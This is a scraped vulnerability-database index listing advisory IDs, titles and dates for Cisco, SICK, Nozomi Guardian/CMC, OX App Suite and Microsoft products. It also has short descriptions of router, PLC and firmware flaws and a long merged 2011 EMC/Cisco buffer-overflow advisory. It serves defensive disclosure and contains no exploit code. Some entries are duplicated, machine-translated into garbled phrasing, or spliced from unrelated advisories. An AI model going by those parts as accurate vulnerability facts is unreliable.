cisco-sa-swa-range-bypass-2bsehysu	Cisco Secure Web Appliance Range Request Bypass Vulnerability	2025-02-05T16:00:00+00:00	2025-02-05T16:00:00+00:00
cisco-sa-ise-xss-42tgsdmg	Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerabilities	2025-02-05T16:00:00+00:00	2025-02-05T16:00:00+00:00
cisco-sa-expressway-xss-uexuzrew	Cisco Expressway Series Cross-Site Scripting Vulnerability	2025-02-05T16:00:00+00:00	2025-02-05T16:00:00+00:00
cisco-sa-esa-sma-xss-wck2wcug	Cisco Secure Email and Web Manager and Secure Email Gateway Cross-Site Scripting Vulnerability	2025-02-05T16:00:00+00:00	2025-02-05T16:00:00+00:00
cisco-sa-esa-sma-wsa-snmp-inf-fqpvl8sx	Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance SNMP Polling Information Disclosure Vulnerability	2025-02-05T16:00:00+00:00	2025-02-05T16:00:00+00:00
cisco-sa-cmm-privesc-uy2vf8pc	Cisco Meeting Management REST API Privilege Escalation Vulnerability	2025-01-22T16:00:00+00:00	2025-01-22T16:00:00+00:00
cisco-sa-clamav-ole2-h549rpha	ClamAV OLE2 File Format Decryption Denial of Service Vulnerability	2025-01-22T16:00:00+00:00	2025-01-22T16:00:00+00:00
cisco-sa-bw-sip-dos-msysbrmt	Cisco BroadWorks SIP Denial of Service Vulnerability	2025-01-22T16:00:00+00:00	2025-01-22T16:00:00+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
sca-2025-0001	Multiple vulnerabilities in SICK MEAC300	2025-02-14T14:00:00.000Z	2025-02-21T14:00:00.000Z
sca-2024-0003	Critical vulnerability in multiple SICK products	2024-10-17T13:00:00.000Z	2024-10-17T13:00:00.000Z
sca-2024-0001	Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics	2024-01-29T00:00:00.000Z	2024-01-29T00:00:00.000Z
sca-2023-0011	Vulnerability in multiple SICK Flexi Soft Gateways	2023-10-23T11:00:00.000Z	2023-10-23T11:00:00.000Z
SCA-2023-0011	Vulnerability in multiple SICK Flexi Soft Gateways	2023-10-23T11:00:00.000Z	2023-10-23T11:00:00.000Z
sca-2023-0010	Vulnerabilities in SICK Application Processing Unit	2023-10-09T11:00:00.000Z	2023-10-09T11:00:00.000Z
SCA-2023-0010	Vulnerabilities in SICK Application Processing Unit	2023-10-09T11:00:00.000Z	2023-10-09T11:00:00.000Z
sca-2023-0008	Vulnerability in SICK SIM1012	2023-09-29T13:00:00.000Z	2023-09-29T13:00:00.000Z
SCA-2023-0008	Vulnerability in SICK SIM1012	2023-09-29T13:00:00.000Z	2023-09-29T13:00:00.000Z
sca-2023-0009	Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products	2023-09-29T10:00:00.000Z	2023-09-29T10:00:00.000Z
SCA-2023-0009	Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products	2023-09-29T10:00:00.000Z	2023-09-29T10:00:00.000Z
sca-2023-0007	Vulnerabilities in SICK LMS5xx	2023-08-25T11:00:00.000Z	2023-08-25T11:00:00.000Z
SCA-2023-0007	Vulnerabilities in SICK LMS5xx	2023-08-25T11:00:00.000Z	2023-08-25T11:00:00.000Z
sca-2023-0006	Vulnerabilities in SICK ICR890-4	2023-07-10T13:00:00.000Z	2023-07-10T13:00:00.000Z
SCA-2023-0006	Vulnerabilities in SICK ICR890-4	2023-07-10T13:00:00.000Z	2023-07-10T13:00:00.000Z
sca-2023-0005	Vulnerabilities in SICK EventCam App	2023-06-19T11:00:00.000Z	2023-06-19T11:00:00.000Z
SCA-2023-0005	Vulnerabilities in SICK EventCam App	2023-06-19T11:00:00.000Z	2023-06-19T11:00:00.000Z
sca-2023-0004	Vulnerabilities in SICK FTMg	2023-05-11T13:00:00.000Z	2023-05-11T13:00:00.000Z
SCA-2023-0004	Vulnerabilities in SICK FTMg	2023-05-11T13:00:00.000Z	2023-05-11T13:00:00.000Z
sca-2023-0003	Vulnerability in SICK Flexi Soft and Flexi Classic Gateways	2023-05-03T13:00:00.000Z	2023-05-03T13:00:00.000Z
SCA-2023-0003	Vulnerability in SICK Flexi Soft and Flexi Classic Gateways	2023-05-03T13:00:00.000Z	2023-05-03T13:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
nn-2023_17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
nn-2023:17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
NN-2023:17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
nn-2024_1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
nn-2024:1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
NN-2024:1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
nn-2023_12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
nn-2023:12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
NN-2023:12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
nn-2023_9-01	Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_8-01	Session Fixation in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_7-01	DoS via SAML configuration in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_6-01	Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_5-01	Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_4-01	Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_3-01	Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_2-01	Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_11-01	SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_10-01	DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_1-01	Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2	2023-05-03T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:9-01	Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:8-01	Session Fixation in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:7-01	DoS via SAML configuration in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:6-01	Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:5-01	Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:4-01	Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:3-01	Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:2-01	Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:11-01	SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:10-01	DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
oxas-adv-2024-0002	OX App Suite Security Advisory OXAS-ADV-2024-0002	2024-03-06T00:00:00+01:00	2024-05-06T00:00:00+00:00
OXAS-ADV-2024-0002	OX App Suite Security Advisory OXAS-ADV-2024-0002	2024-03-06T00:00:00+01:00	2024-05-06T00:00:00+00:00
oxas-adv-2024-0001	OX App Suite Security Advisory OXAS-ADV-2024-0001	2024-02-08T00:00:00+01:00	2024-04-25T00:00:00+00:00
OXAS-ADV-2024-0001	OX App Suite Security Advisory OXAS-ADV-2024-0001	2024-02-08T00:00:00+01:00	2024-04-25T00:00:00+00:00
oxas-adv-2023-0007	OX App Suite Security Advisory OXAS-ADV-2023-0007	2023-12-11T00:00:00+01:00	2024-02-16T00:00:00+00:00
OXAS-ADV-2023-0007	OX App Suite Security Advisory OXAS-ADV-2023-0007	2023-12-11T00:00:00+01:00	2024-02-16T00:00:00+00:00
oxas-adv-2023-0006	OX App Suite Security Advisory OXAS-ADV-2023-0006	2023-09-25T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0005	OX App Suite Security Advisory OXAS-ADV-2023-0005	2023-09-19T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0004	OX App Suite Security Advisory OXAS-ADV-2023-0004	2023-08-01T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0003	OX App Suite Security Advisory OXAS-ADV-2023-0003	2023-05-02T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0002	OX App Suite Security Advisory OXAS-ADV-2023-0002	2023-03-20T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0001	OX App Suite Security Advisory OXAS-ADV-2023-0001	2023-02-06T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2022-0002	OX App Suite Security Advisory OXAS-ADV-2022-0002	2022-11-02T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2022-0001	OX App Suite Security Advisory OXAS-ADV-2022-0001	2022-08-10T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0006	OX App Suite Security Advisory OXAS-ADV-2023-0006	2023-09-25T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0005	OX App Suite Security Advisory OXAS-ADV-2023-0005	2023-09-19T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0004	OX App Suite Security Advisory OXAS-ADV-2023-0004	2023-08-01T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0003	OX App Suite Security Advisory OXAS-ADV-2023-0003	2023-05-02T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0002	OX App Suite Security Advisory OXAS-ADV-2023-0002	2023-03-20T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0001	OX App Suite Security Advisory OXAS-ADV-2023-0001	2023-02-06T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2022-0002	OX App Suite Security Advisory OXAS-ADV-2022-0002	2022-11-02T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2022-0001	OX App Suite Security Advisory OXAS-ADV-2022-0001	2022-08-10T00:00:00+02:00	2024-01-22T00:00:00+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
msrc_cve-2025-21385	Microsoft Purview Information Disclosure Vulnerability	2025-01-09T08:00:00.000Z	2025-01-09T08:00:00.000Z
msrc_cve-2025-21380	Azure Marketplace SaaS Resources Information Disclosure Vulnerability	2025-01-09T08:00:00.000Z	2025-01-09T08:00:00.000Z
msrc_cve-2024-43594	Microsoft System Center Elevation of Privilege Vulnerability	2024-12-10T08:00:00.000Z	2025-01-07T08:00:00.000Z
msrc_cve-2024-49051	Microsoft PC Manager Elevation of Privilege Vulnerability	2024-11-12T08:00:00.000Z	2024-12-31T08:00:00.000Z
msrc_cve-2024-43601	Visual Studio Code for Linux Remote Code Execution Vulnerability	2024-10-08T07:00:00.000Z	2024-12-27T08:00:00.000Z
msrc_cve-2024-43600	Microsoft Office Elevation of Privilege Vulnerability	2024-12-10T08:00:00.000Z	2024-12-23T08:00:00.000Z
msrc_cve-2013-3900	WinVerifyTrust Signature Validation Vulnerability	2022-01-11T08:00:00.000Z	2024-12-23T08:00:00.000Z
msrc_cve-2024-49128	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-16T08:00:00.000Z
msrc_cve-2024-49116	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-16T08:00:00.000Z
msrc_cve-2024-49147	Microsoft Update Catalog Elevation of Privilege Vulnerability	2024-12-10T08:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-49071	Windows Defender Information Disclosure Vulnerability	2024-12-10T08:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-49069	Microsoft Excel Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-43451	NTLM Hash Disclosure Spoofing Vulnerability	2024-11-12T08:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-38183	GroupMe Elevation of Privilege Vulnerability	2024-09-10T07:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-49112	Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-11T08:00:00.000Z
msrc_cve-2024-49142	Microsoft Access Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49138	Windows Common Log File System Driver Elevation of Privilege Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49132	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49129	Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49127	Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49126	Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49125	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49124	Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49123	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49122	Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49121	Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49120	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49119	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49118	Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49117	Windows Hyper-V Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description
var-202407-2188	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause abnormal processing of the device and crash. The device can only be restored by manually restarting the PLC.
var-202406-3119	Beijing StarNet Ruijie Network Technology Co., Ltd. EG3220 is a new generation of multi-service security gateway. Beijing StarNet Ruijie Network Technology Co., Ltd. EG3220 has a command execution vulnerability, which can be exploited by attackers to gain control of the server.
var-202407-1740	NBR6135-E is a router. Beijing Xingwang Ruijie Network Technology Co., Ltd. NBR6135-E has a command execution vulnerability, and attackers can exploit the vulnerability to execute commands.
var-202407-1417	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause equipment shutdown and manually restart the PLC to recover.
var-202407-1103	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause abnormal processing of the device and crash. The device can only be restored by manually restarting the PLC.
var-202407-0957	WinCC is a SCADA system suitable for all walks of life. It can access devices from mobile terminals, extract intelligent data, analyze data and make reports. Siemens (China) Co., Ltd. WinCC has a denial of service vulnerability, which can be exploited by attackers to cause denial of service.
var-202407-0819	SIMATIC S7-1500 is a modular control system suitable for various automation applications in the field of discrete automation. There is a denial of service vulnerability in SIMATIC S7-1500 of Siemens (China) Co., Ltd., which can be exploited by attackers to cause denial of service.
var-202407-0818	NBR6210-E is a router product. Beijing Xingwang Ruijie Network Technology Co., Ltd. NBR6210-E has a command execution vulnerability, which can be exploited by attackers to gain control of the server.
var-202407-0779	Tenda i29V1.0 V1.0.0.5 was discovered to contain a hardcoded password for root. Tenda of i29 A vulnerability exists in the firmware regarding the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0778	Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/addWifiMacFilter. Tenda of AC18 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0745	Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/saveParentControlInfo. Tenda of AC18 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202305-1479	D-Link DIR-2150 SetTriggerPPPoEValidate Username Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20554. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202108-1158	A race condition was addressed with improved locking. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.5. An application may be able to gain elevated privileges. apple's macOS There is a race condition vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. REJECT DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by the CVE program. Notes: none
var-201109-0089	Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ \| Revision \| \| Initial \| \| 1.0 \| 2011-September-14 \| public \| \| \| \| release \| +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) 